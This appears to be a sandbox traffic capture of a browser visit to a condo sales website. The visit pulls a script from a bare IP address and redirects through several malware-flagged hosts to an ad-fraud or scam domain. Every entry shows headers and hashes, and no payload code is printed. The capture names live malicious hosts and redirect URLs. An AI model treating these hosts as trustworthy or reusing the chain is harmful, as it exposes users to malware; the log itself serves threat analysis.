Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:43 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.11.2 HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Sat, 28 Jul 2018 13:54:38 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   229
Md5:    316027d7c5bcb6581dc3e41471024881
Sha1:   c5e43e30279a0fea79f132d668bd36ac3d1f728b
Sha256: 794df3fbacc541f18af0951634112af15854a7b9dad3b483229207b5c22e29d7
                                        
                                            GET /wp-content/uploads/2016/10/the-one-condos.png HTTP/1.1 
Host: 1bloorwestcondo.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         108.167.172.145
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:46 GMT
Content-Length: 15958
Connection: keep-alive
Last-Modified: Wed, 12 Oct 2016 02:56:49 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 282 x 69, 8-bit/color RGB, non-interlaced
Size:   15958
Md5:    64994d5ec763c4a2c5b8e6389c096735
Sha1:   6ff0f685f9ea049dc7f71972e24a43be5915cd57
Sha256: b09194d1adadf291ea64b97841b479b4df8f3cf480fa7ee2deac756da2c03baf
                                        
                                            GET /jquery.js HTTP/1.1 
Host: 134.249.116.78
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         134.249.116.78
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sun, 02 Dec 2018 13:09:44 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Fri, 23 Nov 2018 00:04:43 GMT
Etag: "1e17-57b49baf6567e"
Accept-Ranges: bytes
Content-Length: 7703
Connection: close


--- Additional Info ---
Magic:  ASCII C++ program text, with very long lines
Size:   7703
Md5:    dee1510f3c8cfa55047c6a0041cab6a7
Sha1:   4e3f098926ae626c2e429bd6b1b815800933726b
Sha256: 6ce31fff8e085be331d9d4dfed19eb84788da2ff671f492afb0f4ce1ef712826

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /index.php?cnt=23180211 HTTP/1.1 
Host: 185.143.221.14
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://1bloorwestcondo.ca/floor-plan-pricing/

                                         
                                         185.143.221.14
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sun, 02 Dec 2018 13:09:45 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: __cfbuid=1; expires=Wed, 05-Dec-2018 13:09:45 GMT; Max-Age=259200
Content-Length: 709
Connection: close


--- Additional Info ---
Magic:  HTML document text
Size:   709
Md5:    f2ad116050667c4601c51cffaae0a273
Sha1:   8e3f4452118b3764bd0fa83d50933e0609e84eb4
Sha256: 0ea7c3a52aabc55f149261af5e1736db8c5eb7752737051739c69b18c7ae5c2f

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: 185.143.221.14
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __cfbuid=1

                                         
                                         185.143.221.14
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Date: Sun, 02 Dec 2018 13:09:45 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Mon, 11 Dec 2017 09:00:56 GMT
Etag: "1536-5600cc5aee200"
Accept-Ranges: bytes
Content-Length: 5430
Connection: close


--- Additional Info ---
Magic:  MS Windows icon resource - 2 icons, 16x16, 256-colors
Size:   5430
Md5:    f3418a443e7d841097c714d69ec4bcb8
Sha1:   49263695f6b0cdd72f45cf1b775e660fdc36c606
Sha256: 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "6226B03DB676E5D11EF7E41BD0842B5A1305C00CA30DAFA03CF3C0A71BF6740B"
Last-Modified: Fri, 30 Nov 2018 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16636
Expires: Sun, 02 Dec 2018 17:47:02 GMT
Date: Sun, 02 Dec 2018 13:09:46 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    763fbda1e837e2d227eddf6d54b3fafe
Sha1:   5dcee05c38f3ffbe2c3bb4b02b6b890e3e19ff60
Sha256: 6226b03db676e5d11ef7e41bd0842b5a1305c00ca30dafa03cf3c0a71bf6740b
                                        
                                            POST / HTTP/1.1 
Host: isrg.trustid.ocsp.identrust.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.121
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Transfer-Encoding: Binary
Last-Modified: Fri, 30 Nov 2018 20:42:41 GMT
Etag: "b595a6294de968bdfdeb7bd34f1f0f798f89bc5f"
Content-Length: 1398
Cache-Control: public, no-transform, must-revalidate, max-age=21887
Expires: Sun, 02 Dec 2018 19:14:33 GMT
Date: Sun, 02 Dec 2018 13:09:46 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1398
Md5:    fab9be802c64141810f88b453196df0c
Sha1:   b595a6294de968bdfdeb7bd34f1f0f798f89bc5f
Sha256: 602abc9d87fabebcb6c827c38bc8222b73d9e986e08f30a5c06e56a7c879492f
                                        
                                            GET /ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d HTTP/1.1 
Host: www.hibids10.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://185.143.221.14/index.php?cnt=23180211

                                         
                                         199.193.73.38
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14857833; expires=Mon, 03 Dec 2018 13:09:47 GMT ain=eyJhbGciOiJIUzI1NiJ9.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.0yQfas0mSX2SrLkckf1-RGYzfoLKPnggQ1RcLVp9E9s; expires=Sun, 02 Dec 2018 13:10:47 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1236
Md5:    b49ed0aacfe99b14890f9ff20cd61d78
Sha1:   7a906851bd20049956b22bf50fe1a7b2b2721d0a
Sha256: 1a6c7396ff048899cf66d78fe24ede2d926b4cc66d637dd647bc180eedc0c8d4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "C9040A687C5989316931EF37B6FA6A5E31EDDBA4462593526114E8F1AF49AEFF"
Last-Modified: Sun, 02 Dec 2018 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9720
Expires: Sun, 02 Dec 2018 15:51:47 GMT
Date: Sun, 02 Dec 2018 13:09:47 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    13ff1c1bff0ccc85fa95a355b45049a7
Sha1:   d3ed13515ed63d393b72f848672a971dc09ef529
Sha256: c9040a687c5989316931ef37b6fa6a5e31eddba4462593526114e8f1af49aeff
                                        
                                            GET /stats HTTP/1.1 
Host: r.remarketingpixel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.hibids10.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d
Origin: https://www.hibids10.com

                                         
                                         23.111.224.2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:47 GMT
Content-Length: 40
Connection: keep-alive
Access-Control-Allow-Origin: https://www.hibids10.com
Access-Control-Allow-Credentials: true
Set-Cookie: uid_id2=bbf6d23b-e76e-4292-af73-4b78c5667cc7:2:2; expires=Wed, 29 Nov 2028 13:09:47 GMT; domain=.remarketingpixel.com
Expires: Sun, 02 Dec 2018 13:09:47 GMT
Cache-Control: max-age=0, : no-cache


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   40
Md5:    93d305f951f8e7628404c5a8c90e2eb0
Sha1:   bd05bde1a423e6ed7e925f0094cdd2b0a30579c7
Sha256: bbb37bd1c637274176731f8653144b996bf4a17a349efce8ebb582ff96acf97c
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.hibids10.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.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.0yQfas0mSX2SrLkckf1-RGYzfoLKPnggQ1RcLVp9E9s; cjs=t

                                         
                                         199.193.73.38
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:47 GMT
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            GET /ykwnsxwz29?shu=aa616a03e97d864ba15ecc5fd4dfcce2a0b59cf3b7ead1d9fa246ad795b62045962d8a127eb8b882b0404b8020719e5e4d927c8ac12dc7f3bc873f41afdec0bfa34d8e604aba91ec4a&pst=1543756247&rmtc=t&uuid=bbf6d23b-e76e-4292-af73-4b78c5667cc7%3A2%3A2&pii=&in=false&refer=http%3A%2F%2F185.143.221.14%2Findex.php%3Fcnt%3D23180211&key=9a98439e5dcdf4fd2a011f7cbc76b00d HTTP/1.1 
Host: www.hibids10.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.hibids10.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.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.0yQfas0mSX2SrLkckf1-RGYzfoLKPnggQ1RcLVp9E9s; cjs=t

                                         
                                         199.193.73.38
HTTP/1.1 302 Found
Content-Type: text/html
                                        
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:47 GMT
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: https://adsheads.go2affise.com/click?pid=11&offer_id=4635&sub1=VjN8MTQ4NTc4MzN8MTY3NDM0MXwxMDQ1MDZ8MTU0Mzc1NjE4N3xiYmY2ZDIzYi1lNzZlLTQyOTItYWY3My00Yjc4YzU2NjdjYzd8NzcuNDAuMTI5LjEyM3wxfHNoPWFhNjE2YTAzZTk3ZDg2NGJhMTVlY2M1ZmQ0ZGZjY2UyYTBiNTljZjNiN2VhZDFkOWZhMjQ2YWQ3OTViNjIwNDU5NjJkOGExMjdlYjhiODgyYjA0MDRiODAyMDcxOWU1ZTRkOTI3YzhhYzEyZGM3ZjNiYzg3M2Y0MWFmZGVjMGJmYTM0ZDhlNjA0YWJhOTFlYzRhfDk3YmE1M2I0NTFjYmE2ZmI5NjExYzJlYmRmOWEwNGMw&sub2=14857833
Set-Cookie: uid_id2=bbf6d23b-e76e-4292-af73-4b78c5667cc7:2:2; expires=Sun, 09 Dec 2018 13:09:47 GMT iprc9c4cc1faa645553fd9829e3120285a43=1674341; expires=Sun, 02 Dec 2018 14:09:47 GMT pdhtkv=true; expires=Mon, 03 Dec 2018 13:09:47 GMT uncs=1; expires=Mon, 03 Dec 2018 13:09:47 GMT pdhtkv28=true; expires=Mon, 03 Dec 2018 13:09:47 GMT uncs28=1; expires=Mon, 03 Dec 2018 13:09:47 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            POST / HTTP/1.1 
Host: ocsp.godaddy.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 108
Content-Type: application/ocsp-request

                                         
                                         50.63.243.230
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=90611, public, no-transform, must-revalidate
Last-Modified: Sun, 02 Dec 2018 03:39:29 GMT
Expires: Mon, 03 Dec 2018 15:39:29 GMT
Etag: "5609f0b41a2e339dcfc90028fe2fdb928e4a7753"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
Content-Length: 1778
Connection: close


--- Additional Info ---
Magic:  data
Size:   1778
Md5:    b546b6f5cd844cf31f9d117807a8f4b5
Sha1:   5609f0b41a2e339dcfc90028fe2fdb928e4a7753
Sha256: 58fe953ec00e7015895a5e59ad5d828ccbded6d813133379ac06604b96fccb65
                                        
                                            GET /click?pid=11&offer_id=4635&sub1=VjN8MTQ4NTc4MzN8MTY3NDM0MXwxMDQ1MDZ8MTU0Mzc1NjE4N3xiYmY2ZDIzYi1lNzZlLTQyOTItYWY3My00Yjc4YzU2NjdjYzd8NzcuNDAuMTI5LjEyM3wxfHNoPWFhNjE2YTAzZTk3ZDg2NGJhMTVlY2M1ZmQ0ZGZjY2UyYTBiNTljZjNiN2VhZDFkOWZhMjQ2YWQ3OTViNjIwNDU5NjJkOGExMjdlYjhiODgyYjA0MDRiODAyMDcxOWU1ZTRkOTI3YzhhYzEyZGM3ZjNiYzg3M2Y0MWFmZGVjMGJmYTM0ZDhlNjA0YWJhOTFlYzRhfDk3YmE1M2I0NTFjYmE2ZmI5NjExYzJlYmRmOWEwNGMw&sub2=14857833 HTTP/1.1 
Host: adsheads.go2affise.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.hibids10.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d

                                         
                                         212.32.250.1
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: afclick=5c03d99cf50336000148e369; Expires=Mon, 02 Dec 2019 13:09:48 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   221
Md5:    cfe09a7d498f74a7badefb8c4d21a94c
Sha1:   232c50ee0c736320dbd93aafaf6141548c862775
Sha256: 88cddd0bcb6211390afb87cf533e2b0044b6e36414642c7b65192752aca59312
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: adsheads.go2affise.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: afclick=5c03d99cf50336000148e369

                                         
                                         212.32.250.1
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   125
Md5:    239540730a71a3ab34f1c0f1f87ae03e
Sha1:   4fd8d8975e2d3404e8ac5e2721c1b647ae65d59c
Sha256: 36d5cec09fddadf8132407e8f8c56956c85367dc3d598a1531214a55cca6b368
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "C143C7C4EEE5394F58E40789AB486FDE4657492AEB5E69E194F12F0503EB2DA3"
Last-Modified: Thu, 29 Nov 2018 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=17794
Expires: Sun, 02 Dec 2018 18:06:22 GMT
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    2a2ac614f3af035df4710d67379246d9
Sha1:   8a984ae629b4a97445f8680fa72f1b922a3901aa
Sha256: c143c7c4eee5394f58e40789ab486fde4657492aeb5e69e194f12f0503eb2da3
                                        
                                            GET /BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833 HTTP/1.1 
Host: savegreatdowngradetheclicks.icu
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         51.158.26.248
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: session=afea4cdb-408c-4169-b389-a3c0a206c214
Server: nginx


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   3848
Md5:    95dc97eac04394b8dac849434a5c17ad
Sha1:   613bbd1059aa77d79254fdef9f1b625f90c185a5
Sha256: 9b193f080b3bf299ce1cd8689911eb4d5f110eee3541f383ddfe8221bb409732
                                        
                                            GET /client-m.js HTTP/1.1 
Host: savegreatdowngradetheclicks.icu
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://savegreatdowngradetheclicks.icu/BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833
Cookie: session=afea4cdb-408c-4169-b389-a3c0a206c214

                                         
                                         51.158.26.248
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Content-Length: 5344
Last-Modified: Fri, 30 Nov 2018 21:20:46 GMT
Connection: keep-alive
Etag: "5c01a9ae-14e0"
Server: nginx
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII C++ program text
Size:   5344
Md5:    cb4688825bdfca98fee8106a7f5ffb00
Sha1:   fddf868f2d479d7ea5e75c3e4f7a5cefa16a8dc9
Sha256: 58931b7b9083cb3e0df054a76d7cfbeee1f539ea980658e288fafa5f11039f6a
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Mon, 26 Nov 2018 15:41:53 GMT
Etag: E9C28AA8B1979CBE66D4E4C897C2A699C79D886C
X-OCSP-Responder-ID: mcdpcaocsp13
Content-Length: 471
Cache-Control: public, no-transform, must-revalidate, max-age=94925
Expires: Mon, 03 Dec 2018 15:31:53 GMT
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   471
Md5:    90b8762adb5edbf248dd8a5a2426119d
Sha1:   e9c28aa8b1979cbe66d4e4c897c2a699c79d886c
Sha256: c0f0e2b26b1b4681de61ba97ee3ff09def524d247e0303052ced576fea4b0163
                                        
                                            POST / HTTP/1.1 
Host: ocsp.comodoca.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Tue, 27 Nov 2018 14:14:26 GMT
Etag: 6FA6B179CD614FE8A160C41580E33CE71C547952
X-OCSP-Responder-ID: (null)
Content-Length: 727
Cache-Control: public, no-transform, must-revalidate, max-age=176069
Expires: Tue, 04 Dec 2018 14:04:17 GMT
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   727
Md5:    2104a67db4d344a5bfb3b37ad543a4f7
Sha1:   6fa6b179cd614fe8a160c41580e33ce71c547952
Sha256: ae4a997c6f6d517fa47a3454c746791e438388055f46ee8a43f81743d9809a78
                                        
                                            POST / HTTP/1.1 
Host: ocsp.usertrust.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Apache
Last-Modified: Tue, 27 Nov 2018 14:14:26 GMT
Etag: 553C8792AD0C3E0A9A992944F8D02F21397A4F4B
X-OCSP-Responder-ID: (null)
Content-Length: 471
Cache-Control: public, no-transform, must-revalidate, max-age=176080
Expires: Tue, 04 Dec 2018 14:04:28 GMT
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   471
Md5:    b1dd6bf93b975619ca9f8f915385a7af
Sha1:   553c8792ad0c3e0a9a992944f8d02f21397a4f4b
